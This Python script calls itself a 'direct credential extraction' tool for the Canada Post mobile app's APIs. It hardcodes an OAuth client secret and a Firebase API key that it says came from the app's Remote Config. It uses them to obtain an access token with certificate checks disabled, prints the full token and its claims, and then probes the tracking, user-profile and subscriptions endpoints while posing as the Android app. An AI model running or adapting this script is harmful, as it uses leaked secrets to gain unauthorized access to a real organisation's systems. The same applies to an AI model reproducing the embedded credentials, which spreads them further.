#!/usr/bin/env python3 """ Extract credentials from Canada Post app directly Uses the known OAuth credentials and tests the APIs """ import requests import json import base64 from datetime import datetime # Known credentials from Firebase Remote Config (already found) CLIENT_ID = "cpc-appcheck-android" CLIENT_SECRET = "1mhxwdN1Y5afLQgYeEgZ" FIREBASE_PROJECT = "canada-post-2dce9" FIREBASE_API_KEY = "AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q" OAUTH_ENDPOINT = "https://oauth-osu.canadapost-postescanada.ca/mga/sps/oauth/oauth20/token" TRACKING_ENDPOINT = "https://www.canadapost-postescanada.ca/mgw/trackpackage/json/package" def get_user_token(test_credentials=None): """Get a user session token using OAuth""" print("\n" + "="*80) print(" STEP 1: OBTAINING USER SESSION TOKEN") print("="*80) headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Canada Post Android App", } # OAuth payload for client credentials flow data = { "grant_type": "client_credentials", "client_id": CLIENT_ID, "client_secret": CLIENT_SECRET, "scope": "openid profile email" } print(f"\n[*] Requesting token from: {OAUTH_ENDPOINT}") print(f"[*] Using client_id: {CLIENT_ID}") try: response = requests.post(OAUTH_ENDPOINT, headers=headers, data=data, timeout=10, verify=False) print(f"[*] Response status: {response.status_code}") if response.status_code == 200: token_data = response.json() print(f"\n[✓] Token obtained successfully!") print(f"[*] Token type: {token_data.get('token_type', 'Bearer')}") print(f"[*] Expires in: {token_data.get('expires_in', 'unknown')} seconds") token = token_data.get('access_token') if token: print(f"\n[🔑] ACCESS TOKEN:") print(f" {token[:50]}...") print(f" Full: {token}") # Try to decode if JWT if token.count('.') == 2: try: parts = token.split('.') payload = parts[1] # Add padding if needed padding = 4 - len(payload) % 4 if padding != 4: payload += '=' * padding decoded = base64.urlsafe_b64decode(payload) claims = json.loads(decoded) print(f"\n[📋] Token Claims:") for key, value in claims.items(): print(f" {key}: {value}") except Exception as e: print(f"\n[!] Could not decode token: {e}") return token else: print(f"\n[!] No access_token in response") print(f"[!] Response: {response.text}") return None else: print(f"[!] Failed to get token") print(f"[!] Response: {response.text}") return None except Exception as e: print(f"[!] Error: {e}") return None def test_tracking_api(token, package_number="1234567890"): """Test the tracking API with a token""" print("\n" + "="*80) print(" STEP 2: TESTING TRACKING API") print("="*80) if not token: print("[!] No token provided, skipping tracking test") return headers = { "Authorization": f"Bearer {token}", "User-Agent": "Canada Post Android App", "Accept": "application/json", } params = { "pins": package_number } print(f"\n[*] Testing tracking endpoint: {TRACKING_ENDPOINT}") print(f"[*] Package number: {package_number}") try: response = requests.get(TRACKING_ENDPOINT, headers=headers, params=params, timeout=10, verify=False) print(f"[*] Response status: {response.status_code}") if response.status_code == 200: data = response.json() print(f"\n[✓] Tracking data obtained!") print(f"[*] Response preview:") print(json.dumps(data, indent=2)[:500]) return data else: print(f"[!] Got status: {response.status_code}") print(f"[!] Response: {response.text[:200]}") return None except Exception as e: print(f"[!] Error: {e}") return None def test_mobile_integration_api(token): """Test the mobile integration API""" print("\n" + "="*80) print(" STEP 3: TESTING MOBILE INTEGRATION API") print("="*80) if not token: print("[!] No token provided, skipping") return headers = { "Authorization": f"Bearer {token}", "User-Agent": "Canada Post Android App", "Content-Type": "application/json", } endpoints = [ "https://mobileintegration.1eqh5zpddmks.us-east.codeengine.appdomain.cloud/api/v1/web/de64ec88-9d4b-4925-a98d-65678e01b6bb/default/MobileIntegration", "https://q26ff9ws86.execute-api.ca-central-1.amazonaws.com/prod/v1/user/profile", "https://q26ff9ws86.execute-api.ca-central-1.amazonaws.com/prod/v1/subscriptions", ] for endpoint in endpoints: print(f"\n[*] Testing: {endpoint[:60]}...") try: response = requests.post(endpoint, headers=headers, json={}, timeout=5, verify=False) print(f" Status: {response.status_code}") if response.status_code < 400: print(f" Response: {response.text[:100]}") except Exception as e: print(f" Error: {e}") # Disable SSL warnings import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if __name__ == "__main__": print("\n" + "="*80) print(" CANADA POST API - DIRECT CREDENTIAL EXTRACTION") print("="*80) print("\nUsing known OAuth credentials from Firebase Remote Config:") print(f" Client ID: {CLIENT_ID}") print(f" Client Secret: {CLIENT_SECRET}") print(f" OAuth Endpoint: {OAUTH_ENDPOINT}") # Step 1: Get token token = get_user_token() # Step 2: Test tracking if token: test_tracking_api(token, "1234567890") # Step 3: Test other APIs test_mobile_integration_api(token) print("\n" + "="*80) print(" DONE") print("="*80) print("\n[*] If token was obtained, you can use it for further API testing") print("[*] Save the token for later use in test_apis.py\n")